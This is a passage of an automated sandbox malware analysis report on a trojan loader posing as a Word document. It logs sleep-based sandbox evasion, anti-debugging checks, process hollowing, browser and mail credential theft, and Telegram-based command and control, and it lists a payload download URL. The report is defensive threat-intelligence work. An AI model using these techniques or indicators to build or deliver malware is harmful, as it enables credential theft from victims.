          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596625Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596485Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596375Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596266Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596156Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596047Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595938Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595828Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595715Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595594Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595484Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595375Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595266Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595156Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595033Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594719Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594532Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594407Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594282Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594157Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594032Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 593922Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 922337203685477
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 600000
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599875
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599765
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599656
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599515
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599405
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599282
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599000
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598795
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598686
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598577
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598453
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598343
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598234
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598124
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598015
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597906
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597796
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597687
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597578
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597468
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597359
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597250
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597140
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597031
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596921
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596812
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596703
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596586
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596484
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596374
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596265
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596156
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596046
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595937
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595827
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595718
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595609
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595500
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595390
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595281
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595171
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595062
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594953
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594843
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594734
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594625
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594515
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594406
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594296
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594187
          Source: C:\Users\Public\Libraries\xzeheenC.pifWindow / User API: threadDelayed 1250Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifWindow / User API: threadDelayed 8583Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifWindow / User API: threadDelayed 2401Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifWindow / User API: threadDelayed 7433Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifWindow / User API: threadDelayed 6831
          Source: C:\Users\Public\Libraries\xzeheenC.pifWindow / User API: threadDelayed 3013
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep count: 34 > 30Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -31359464925306218s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 6756Thread sleep count: 1250 > 30Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 6756Thread sleep count: 8583 > 30Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -599875s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -599766s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -599656s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -599547s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -599437s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -599328s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -599219s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -599094s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -598985s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -598870s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -598750s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -598641s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -598516s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -598406s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Code function: 0_2_029C58B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_029C58B4
          Source: xzeheenC.pif, 0000000D.00000002.3467243352.000000002ED66000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR-
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2236856476.00000000007B6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
          Source: xzeheenC.pif, 00000004.00000002.3466173461.000000001B216000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ?e
          Source: Cneehezx.PIF, 00000006.00000002.2343999194.0000000000740000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3468775169.000000003260D000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 0000000A.00000002.2424965062.00000000007F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2236856476.000000000076E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2236856476.00000000007B6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW\
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe API call chain: ExitProcess graph end node graph_0-25165
          Source: C:\Users\Public\Libraries\xzeheenC.pif API call chain: ExitProcess graph end node graph_4-52500
          Source: C:\Users\Public\Libraries\xzeheenC.pif API call chain: ExitProcess graph end node
          Source: C:\Users\Public\Libraries\Cneehezx.PIF API call chain: ExitProcess graph end node
          Source: C:\Users\Public\Libraries\xzeheenC.pif Process information queried: ProcessInformation

          Anti Debugging

          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Code function: 0_2_029DEBF0 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_029DEBF0
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Process queried: DebugPort
          Source: C:\Users\Public\Libraries\Cneehezx.PIF Process queried: DebugPort
          Source: C:\Users\Public\Libraries\Cneehezx.PIF Process queried: DebugPort
          Source: C:\Users\Public\Libraries\xzeheenC.pif Code function: 4_2_1F6EE660 LdrInitializeThunk,LdrInitializeThunk,4_2_1F6EE660
          Source: C:\Users\Public\Libraries\xzeheenC.pif Code function: 4_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0040CE09
          Source: C:\Users\Public\Libraries\xzeheenC.pif Code function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,4_2_004019F0
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Code function: 0_2_029D87A0 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_029D87A0
          Source: C:\Users\Public\Libraries\xzeheenC.pif Code function: 4_2_0040ADB0 GetProcessHeap,HeapFree,4_2_0040ADB0
          Source: C:\Users\Public\Libraries\xzeheenC.pif Process token adjusted: Debug
          Source: C:\Users\Public\Libraries\xzeheenC.pif Code function: 4_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0040CE09
          Source: C:\Users\Public\Libraries\xzeheenC.pif Code function: 4_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0040E61C
          Source: C:\Users\Public\Libraries\xzeheenC.pif Code function: 4_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00416F6A
          Source: C:\Users\Public\Libraries\xzeheenC.pif Code function: 4_2_004123F1 SetUnhandledExceptionFilter,4_2_004123F1
          Source: C:\Users\Public\Libraries\xzeheenC.pif Code function: 4_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_1_0040CE09
          Source: C:\Users\Public\Libraries\xzeheenC.pif Code function: 4_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_1_0040E61C
          Source: C:\Users\Public\Libraries\xzeheenC.pif Code function: 4_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_1_00416F6A
          Source: C:\Users\Public\Libraries\xzeheenC.pif Code function: 4_1_004123F1 SetUnhandledExceptionFilter,4_1_004123F1
          Source: C:\Users\Public\Libraries\xzeheenC.pif Code function: 9_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_0040CE09
          Source: C:\Users\Public\Libraries\xzeheenC.pif Code function: 9_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_0040E61C
          Source: C:\Users\Public\Libraries\xzeheenC.pif Code function: 9_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00416F6A
          Source: C:\Users\Public\Libraries\xzeheenC.pif Code function: 9_2_004123F1 SetUnhandledExceptionFilter,9_2_004123F1
          Source: C:\Users\Public\Libraries\xzeheenC.pif Code function: 9_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_1_0040CE09
          Source: C:\Users\Public\Libraries\xzeheenC.pif Code function: 9_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_1_0040E61C
          Source: C:\Users\Public\Libraries\xzeheenC.pif Code function: 9_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_1_00416F6A
          Source: C:\Users\Public\Libraries\xzeheenC.pif Code function: 9_1_004123F1 SetUnhandledExceptionFilter,9_1_004123F1
          Source: C:\Users\Public\Libraries\xzeheenC.pif Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Memory allocated: C:\Users\Public\Libraries\xzeheenC.pif base: 400000 protect: page execute and read and write
          Source: C:\Users\Public\Libraries\Cneehezx.PIF Memory allocated: C:\Users\Public\Libraries\xzeheenC.pif base: 400000 protect: page execute and read and write
          Source: C:\Users\Public\Libraries\Cneehezx.PIF Memory allocated: C:\Users\Public\Libraries\xzeheenC.pif base: 400000 protect: page execute and read and write
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section unmapped: C:\Users\Public\Libraries\xzeheenC.pif base address: 400000
          Source: C:\Users\Public\Libraries\Cneehezx.PIF Section unmapped: C:\Users\Public\Libraries\xzeheenC.pif base address: 400000
          Source: C:\Users\Public\Libraries\Cneehezx.PIF Section unmapped: C:\Windows\SysWOW64\cmd.exe base address: 400000
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Memory written: C:\Users\Public\Libraries\xzeheenC.pif base: 36C008
          Source: C:\Users\Public\Libraries\Cneehezx.PIF Memory written: C:\Users\Public\Libraries\xzeheenC.pif base: 2D6008
          Source: C:\Users\Public\Libraries\Cneehezx.PIF Memory written: C:\Users\Public\Libraries\xzeheenC.pif base: 3BD008
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Process created: C:\Users\Public\Libraries\xzeheenC.pif C:\Users\Public\Libraries\xzeheenC.pif
          Source: C:\Users\Public\Libraries\Cneehezx.PIF Process created: C:\Users\Public\Libraries\xzeheenC.pif C:\Users\Public\Libraries\xzeheenC.pif
          Source: C:\Users\Public\Libraries\Cneehezx.PIF Process created: C:\Users\Public\Libraries\xzeheenC.pif C:\Users\Public\Libraries\xzeheenC.pif
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_029C5A78
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Code function: GetLocaleInfoA,0_2_029CA798
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Code function: GetLocaleInfoA,0_2_029CA74C
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_029C5B84
          Source: C:\Users\Public\Libraries\xzeheenC.pif Code function: GetLocaleInfoA,4_2_00417A20
          Source: C:\Users\Public\Libraries\xzeheenC.pif Code function: GetLocaleInfoA,4_1_00417A20
          Source: C:\Users\Public\Libraries\xzeheenC.pif Code function: GetLocaleInfoA,9_2_00417A20
          Source: C:\Users\Public\Libraries\xzeheenC.pif Code function: GetLocaleInfoA,9_1_00417A20
          Source: C:\Users\Public\Libraries\Cneehezx.PIF Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,10_2_02AD5A78
          Source: C:\Users\Public\Libraries\Cneehezx.PIF Code function: GetLocaleInfoA,10_2_02ADA798
          Source: C:\Users\Public\Libraries\Cneehezx.PIF Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,10_2_02AD5B83
          Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Users\Public\Libraries\xzeheenC.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\Public\Libraries\xzeheenC.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\Public\Libraries\xzeheenC.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
          Source: C:\Users\Public\Libraries\xzeheenC.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\Public\Libraries\xzeheenC.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Code function: 0_2_029C9194 GetLocalTime,0_2_029C9194
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Code function: 0_2_029CB714 GetVersionExA,0_2_029CB714
          Source: C:\Users\Public\Libraries\xzeheenC.pif Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: C:\Users\Public\Libraries\xzeheenC.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Users\Public\Libraries\xzeheenC.pif File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Users\Public\Libraries\xzeheenC.pif File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
          Source: C:\Users\Public\Libraries\xzeheenC.pif Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

          Remote Access Functionality

          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
          Gather Victim Identity Information | Acquire Infrastructure | 1 Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
          Credentials | Domains | Default Accounts | 1 Shared Modules | 1 Valid Accounts | 1 Valid Accounts | 11 Deobfuscate/Decode Files or Information | LSASS Memory | 1 System Network Connections Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
          Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | 1 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 3 Obfuscated Files or Information | Security Account Manager | 1 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
          Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 311 Process Injection | 3 Software Packing | NTDS | 36 System Information Discovery | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
          Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 1 Registry Run Keys / Startup Folder | 1 Timestomp | LSA Secrets | 341 Security Software Discovery | SSH | Keylogging | 114 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
          Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 41 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
          DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 Masquerading | DCSync | 2 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
          Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Valid Accounts | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
          Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Access Token Manipulation | /etc/passwd and /etc/shadow | 1 System Network Configuration Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
          IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 41 Virtualization/Sandbox Evasion | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
          Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 311 Process Injection | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
          Behavior Graph ID: 1577649 Sample: D.G Governor Istek,Docx.exe Startdate: 18/12/2024 Architecture: WINDOWS Score: 100

          Top-level DNS/IP: api.telegram.org (signature: Uses the Telegram API (likely for C&C communication)); s3-w.us-east-1.amazonaws.com; 5 other IPs or domains
          Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 18 other signatures

          Process: D.G Governor Istek,Docx.exe (started)
            DNS/IP: bitbucket.org 185.166.143.49, 443, 49714, 49715 AMAZON-02US Germany
            DNS/IP: s3-w.us-east-1.amazonaws.com 52.217.32.148, 443, 49716 AMAZON-02US United States
            Dropped: C:\Users\Public\Libraries\xzeheenC.pif, PE32
            Dropped: C:\Users\Public\Libraries\Cneehezx.PIF, PE32
            Dropped: C:\Users\Public\Libraries\FX.cmd, DOS
            Dropped: 2 other malicious files
            Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Sample uses process hollowing technique
            Child process: xzeheenC.pif (started)
              DNS/IP: checkip.dyndns.com 132.226.247.73, 49731, 49759, 49775 UTMEMUS United States
              DNS/IP: api.telegram.org 149.154.167.220, 443, 49758, 49782 TELEGRAMRU United Kingdom
              Signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Tries to steal Mail credentials (via file / registry access)
            Child process: cmd.exe (started)
              Child process: conhost.exe (started)

          Process: Cneehezx.PIF (started)
            Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Sample is not signed and drops a device driver
            Child process: xzeheenC.pif (started)
            Child process: cmd.exe (started)
              Child process: conhost.exe (started)

          Process: Cneehezx.PIF (started)
            Signatures: Allocates many large memory junks
            Child process: xzeheenC.pif (started)
              Signatures: Tries to harvest and steal browser information (history, passwords, etc)
            Child process: cmd.exe (started)
              Child process: conhost.exe (started)

Source | Detection | Scanner | Label
D.G Governor Istek,Docx.exe | 53% | ReversingLabs | Win32.Trojan.ModiLoader
D.G Governor Istek,Docx.exe | 100% | Avira | HEUR/AGEN.1326111

Source | Detection | Scanner | Label
C:\Users\Public\Libraries\Cneehezx.PIF | 100% | Avira | HEUR/AGEN.1326111
C:\Users\Public\Libraries\Cneehezx.PIF | 53% | ReversingLabs | Win32.Trojan.ModiLoader
C:\Users\Public\Libraries\xzeheenC.pif | 3% | ReversingLabs |

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
http://checkip.dyndns.P | 0% | Avira URL Cloud | safe
http://ocsp.sectigo.com0C | 0% | Avira URL Cloud | safe
http://www.pmail.com0 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
s3-w.us-east-1.amazonaws.com | 52.217.32.148 | true | false | | high
bitbucket.org | 185.166.143.49 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
checkip.dyndns.com | 132.226.247.73 | true | false | | high
bbuseruploads.s3.amazonaws.com | unknown | unknown | false | | high
checkip.dyndns.org | unknown | unknown | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://bitbucket.org/ntim1478/gpmaw/downloads/202_Cneehezxuzj | false | | high
http://checkip.dyndns.org/ | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
52.217.32.148 | s3-w.us-east-1.amazonaws.com | United States | 16509 | AMAZON-02US | false
185.166.143.49 | bitbucket.org | Germany | 16509 | AMAZON-02US | false
132.226.247.73 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1577649
Start date and time: 2024-12-18 16:15:35 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 31s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: D.G Governor Istek,Docx.exe
Detection: MAL
